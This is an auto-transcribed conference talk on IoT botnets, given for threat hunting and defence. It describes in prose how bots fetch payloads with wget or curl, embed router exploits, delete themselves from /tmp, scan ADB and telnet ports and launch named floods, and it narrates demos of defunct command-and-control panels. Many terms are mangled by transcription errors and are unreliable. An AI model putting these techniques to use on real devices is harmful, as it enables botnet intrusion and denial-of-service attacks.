BSides Berlin 2021: Aditya K Sood - Internet of Things or Threats

welcome everyone so i hope you are having a great time at the conference it's kind of like a pretty early morning in san francisco here so bear with me a few things so let's get it started so today we are going to talk about internet of things or threats we really need to understand what exactly it is all about we're going to look into the iot bots and how bottom ups are designed we're gonna focus primarily on you know some of the tactics and techniques these uh iot parts use and of course the botnet operators deploy those techniques and we're also going to look at a few demos breaking down internally into the iot botnet cnc panels

so let's get it started then it's a little disclaimer so all the research and interesting information that we are going to share during the course of this talk is only for community purposes which means that we're going to strengthen the threat hunting efforts intelligence efforts and all those making sure that you know we make our security community more secure and more collaborative in nature a little brief background of mine i've been into this industry for 14 years right now author couple of books so you get an idea what we are going to discuss today we know about that topic and if you're really interested in looking at my background what it is all about you can go to a few urls here and

get an idea what it is all about so what are we going to talk today we're going to look into iot threads if you look around you know looking at the internet hemisphere iot devices are deployed and configured all across the internet various networks and attackers are utilizing these devices because of insecure characteristics and inherent security issues maybe vulnerabilities misconfigurations and all that and how they actually exploit them of course using an automated way because partners at the end of the day is a collection of you know compromised machines in this case when we talk about iot partners it's more focused on compromised iot devices and we're going to take a look into multiple iot cnc panels that we

discussed discovered during the course of this research and that actually highlights you and you will get an idea how exactly these panels look like it might be different from the standard partners because of the different communication protocol being used but you will have an interesting idea by encountering this thing via live demo so let's understand what we're in which world we are living right now of course iot threats so these are couple of media headlines i have put up here so that you can get an idea how sweet the problem is just imagine billions of people all across the globe using this internet and to support that internet functionalities we really need hardware devices of course we are moving towards

cloud but at the end of the day still there are data centers there are chips there are iot devices that are allowing this functionality to flourish but of course you know we are living in the world where cyber crime is increasing at an exponential rate and of course attackers are going to target these iot devices as well and that is i would say in their terms as a need of the hour because they want to utilize the free hardware that are sitting on the internet not secured and they want to exploit those devices and harness the power of those devices and the idea is to just conduct the various operations on the internet to make sure

they achieve what they want to the overall perspective here is that this is a very very deep and a very very interesting problem that is obscurity researchers practitioners we really need to look into in making sure what advancements we can make to actually circumvent these iot threads in order to do that we really need to understand how these bots are designed and operated in this case for the next seven to ten minutes we are going to look into some of the iot box attacks and mechanisms including different characteristics it is very important to understand how the these devices are getting exploited what techniques these iot attackers are using to conduct these unauthorized operations let's take a look into it

so what we are going to look into in this context is distribution of iot binaries of course how the iot binaries are distributed across the internet we're going to look at some of the characteristics like why camouflage iot binaries are used you know obvious kt obviously action being placed exploit some baggage in those iot binaries interesting self-deletion capabilities of course executing mass scans distributed denial of service attacks and at the end how these iot bots are actually utilizing the inherent system tools to trigger the execution of various exploits or unauthorized operations on the operating system itself any device running linux unix or any flavor of it at the end of the day you really need to

control the operating system from the user level to the kernel level to ensure you conduct you operate and trigger those kind of functionalities which iot bots need in order to do that they really need to be on that system exploit a vulnerability for example a privilege escalation and all that so we'll take a look into that as well so let's move forward with this the very first thing i want to talk about here is the distribution of iot binaries a couple of screenshots i did here give you the idea one of the interesting scenario that we have seen all across is the setting up of exposed web server on the internet it gathered it can either

be on the cloud infrastructure or it can be either on the compromised servers data centers you know sort of things like that and they simply deploy a web server which is unauthenticated and they just host the resources on that server for a short period of time so that when the malware is distributed and the payloads are executed on the iot devices they actually contact these web servers of course since no authentication authorization you can simply connect them either by wget tool or curl tool and then you know fetch the resources on the compromised iot device and the idea in this case is that you know since everything is compromised in here you know the web resources are

openly available on the internet and you can connect it and then you can download those additional payloads and start executing those payloads on the compromised iot device and that is one of the important part we really need to understand because that's the place where infection starts so distribution of iod binaries is an important part and as a part of the research we really need to see conduct scans build intelligence to fetch where exactly these binaries are located supporting multi-architecture depending on which architecture certain devices sport another interesting uh artifact that i wanna call here is the use of camouflaged names so let's say you have this uh web resource which you are seeing in the screenshot

and it's like exposed on the internet of course it has to be but if you look at the naming convention being used here and the way iot bots are using it or maybe the attackers are using this naming convention it looks like these are legit binaries dns dns scan aldapaldev scan and so on but in fact these are malicious in nature so as a result you look at these binaries initially on the operating system when you're a bit of scanning or when you're looking at your for your own purpose you see these binaries look legit but exactly it is not so in that case we cannot rely on the basic naming or the basic structure we really need to

do a little bit more content inspection and understanding how these binaries are interacting with the operating system so generally as a part of remembrance this is a one part where exactly camouflage boundaries are distributed across the internet as well and we really need to see making sure that we differentiate between these binaries when we are analyzing it another interesting characteristic and the way these iot parts are designed attackers of course use some sort of packers making sure that it impacts reverse engineering efforts a bit but that should not stop you or there is no way i mean if the bot is packed you cannot unpack it but interestingly it actually added another layer of effort to unpack the

bot and then making sure that you are able to get the right payloads out of it before you start analyzing it but that is more important that you conduct all these steps making sure that you know the iot ports or any part you are specifically analyzing how it looks like how the structure looks like where is an elf binary which architecture is supposed you know whether it's packed or not so we really need to see that and that is a thing we have seen across many iot parts in this case the example highlights a upx packer but you can unpack it but more efforts are needed in that direction another interesting scenario that you need to look into the embedded x-parts

of the iot binaries remember these are scripts that are installed the iot devices primarily in the temp directory because that's where these files are fetched and what happened in that case they have embedded payloads since most of these iot devices are somewhat connected to the internet and have a very lower security from configuration perspective which means the ingress and egress rules are pretty easy in nature you can connect to anything on the internet depending on it's an http traffic and all that which make it quite easy and to actually embed the exploits in iot bots and execute them so if you look at in this particular example it's just an exploit related to the linksys router

but you can see that the bot payload already has http post requests from where they want to do it so it means attackers are compromising one iot device and using that iot device to execute exploits by mass scanning other iot devices on the internet so if you find it you find a particular port that is open whether it's on http specific or any other protocols telnet rdp and all you can actually go ahead and utilize that iot device that is compromised and then trigger exploits against other known or unknown iot devices on the internet so generally if you have any protection solution in place or detection solution in place they see that this attack is coming from one specific iot

device not exactly any other system so it seems like you know attackers playing a lot by compromising iot devices and utilizing one to attack the other i think that's a part of the change in factionness and that's how you build iot botnets a network of bots another interesting tactic that you really need to look into is is a self deletion and remover of storage payloads so most of the time what we have seen that in temp directory on these iot devices our temporary scripts are being downloaded and once those scripts are executed in the system they have a self-deletion module in it which means they are going to clean the temp directory and once the

payloads are executed starts opening network communication channel-wise sockets and all that they actually clean the raw binary which means as a part of the self-deletion to reduce the number of artifacts that are staying on the operating system after the execution to ensure that when any researchers are coming across any post execution analysis is performed they are not able to find most of the content of the payload and all that i mean there are still other ways but you have to dig pretty deep into it but if this picture actually here represents you how an example if we look into the update or asset file in the temp directory how it executes command and what exactly it

does and then it actually cleans it so if you look at the remove iphone rf and then it starts cleaning those binaries as well the next one is is executing mass scan so your iot device is compromised and what you want to do with it of course you want to utilize the power and harness the power of that device to trigger more mass scans on the internet so that you find more vulnerable devices and exploit them and make them as a part of the iot department so these few examples highlight you exactly how the iot devices compromised in nature are conducting scans against for example another android iot devices uh looking at the tcp port number 5555

which is android debug port and a telnet code on 23 in the second figure so you can conduct multiple types of scan with that as well so the next one is looking at the triggering denial of service attacks so of course i mean if you have a network of iod parts that are communicating between each other and working as a one network you want to utilize that network to conduct some unexpected scans and launching denial of service attacks that these bots support so if we have a n number of iot ports in the network so you can utilize the those and number of bots to trigger dedicated scans on variety of ports utilizing different communication

channels so a few examples that we highlighted here are taken from the cnc panels directly so we have like you know you have tcp variety of floods that you can trigger udp plane std vsc ovh games stomp frag xms and you can go for basically an application layer denial of service as well as you can go for a network clear denial of service targeting other dedicated resources on the internet and that is one of the important part and as everybody who you know conduct research in this wheel they know that denial of services are one of the important functionality these bots botnets provide another interesting thing which i really want to highlight that a very important one is the utilizing of

the system tools so when couple of these scripts are installed on iot devices primarily so because of these iot devices is running next version like linux some version of their unix on it so they come so they are actually have some sort of system tools available by default some of that related to you know for example curl utility wget utility and for similar things like that so if you have those utility available in the system and you have a very insecure configuration where you allow to connect anything on the internet so once you install these scripts they actually utilize those tools to fetch more binaries on the system iot bot payloads or some bzbox kind of

libraries if it is not installed on the iot device and they actually utilize to automate the process of downloading more infectious tools on the system but at first they utilize the system power tools it means whenever you're analyzing iot pods conducting research you need to make sure you look into the usage of these tools as well for example if you're analyzing logs you want to see that all the how these tools are being used where they are connecting to how long they are connecting to the remote destination on the internet but this is a one of the very important uh play that these attackers you go for it and then conduct you know the various operations as i

discussed earlier on the internet but these system tools play a critical role in that as well so few examples highlighted here you can see that busy box are used in conjunction with the wget here we are having a base64 encoder decoder functionality python and all that but this is all the part and parcel of the malicious toolkit that these iot bots use so now since we have gone through understanding you know why critical iot threats are and how they exist and looking into some of the attack techniques and tactics we really need to look into a few demonstrations here and the important part is that to get a feel of it how it looks like

so let's go through the first one in this simple one minute demo what i have exactly highlighting is the internal details of the a verizon iot partner cnc panel and let's take a look into it so it's a part of the research we're logging back into the the cnc panel which is not active anymore but we made a video because it was exactly for like a few hours but try to highlight how it looks like and how we really need to build intelligence out of it

using some of the commands here now you can see that which functionality the cnc provides what kind of activities can be performed yeah so this is a quick overview how it looks like and it gives you the idea the different kind of operation that you can perform from this cnc panel and just imagine this cnc panel is not a similar for what kind of uh different partners that we have analyzed earlier or we have the world has seen like zeus spy eyes citadel and many other like that those are much more operated and the cnc panels are hosted on the as a web resource because they utilize http communication in this particular case it is just a custom version that is

being deployed on the top of the telnet protocol and that's how they actually design these iot bot cnc panels now in the next video i'm going to do a detail look into multiple cnc panels so that you can imagine the design stays the same but there are many cnc panel that exist in the wild earlier you have seen the verizon iot panel now i'm going to show you exactly multiple panels and how they look like in the functionalities they provide

so this is an example of the kawari iot pod and just all these panels are now gone so that's why we are presenting this video just try to give you an idea how the real world looks like how the underground cyber community you know works whatever we are doing on the internet in front is not exactly what is happening in the back end so this is another example of an iot ball another one

these are like a small botnets not enough iod bots residing in it but still they can do the damage if they want to and this is an example of the dank net still they have some bots residing in that

yeah so the purpose of showing a quick demo about what's the internal structure of cnc panels will apply and how different communication channels are utilized you can get an idea what kind of research you need to perform down the lane to kind of strengthen your existing security detection and protection solutions so that you can actually deploy those solutions in the real world and prevent these kind of attacks but in order to do that we have to really go deep into the understanding the internal architecture of these iot partners how they operate how their these bots are distributed how they spread infections and how exactly they create chain and factions and related artifacts so after going to understanding you know

what iot threads look like how exponential these iot threads are increasing and going through characteristics and functionalities and looking at a few demos i would like to make a call as a part of and friends here security is not a one-step process security is a continuous process we need a multi-faceted approach to build intelligence in order to circumvent and defend against threats in the iot hemisphere which means that one approach are not going to work and we will not survive that we really need multi-step approach a very deep defense and depth layer mechanisms where every layer is good enough to provide security and then we actually go for building a strong and robust production solutions

to defend our internet infrastructure against these nefarious attacks but at the end of the day we really need multi-facet approach so i'll stop by here any questions and queries i hope you enjoy this talk and i would love to have more discussion on this front uh feel free to ask any queries and i appreciate all your time and support for attending this talk thank you very much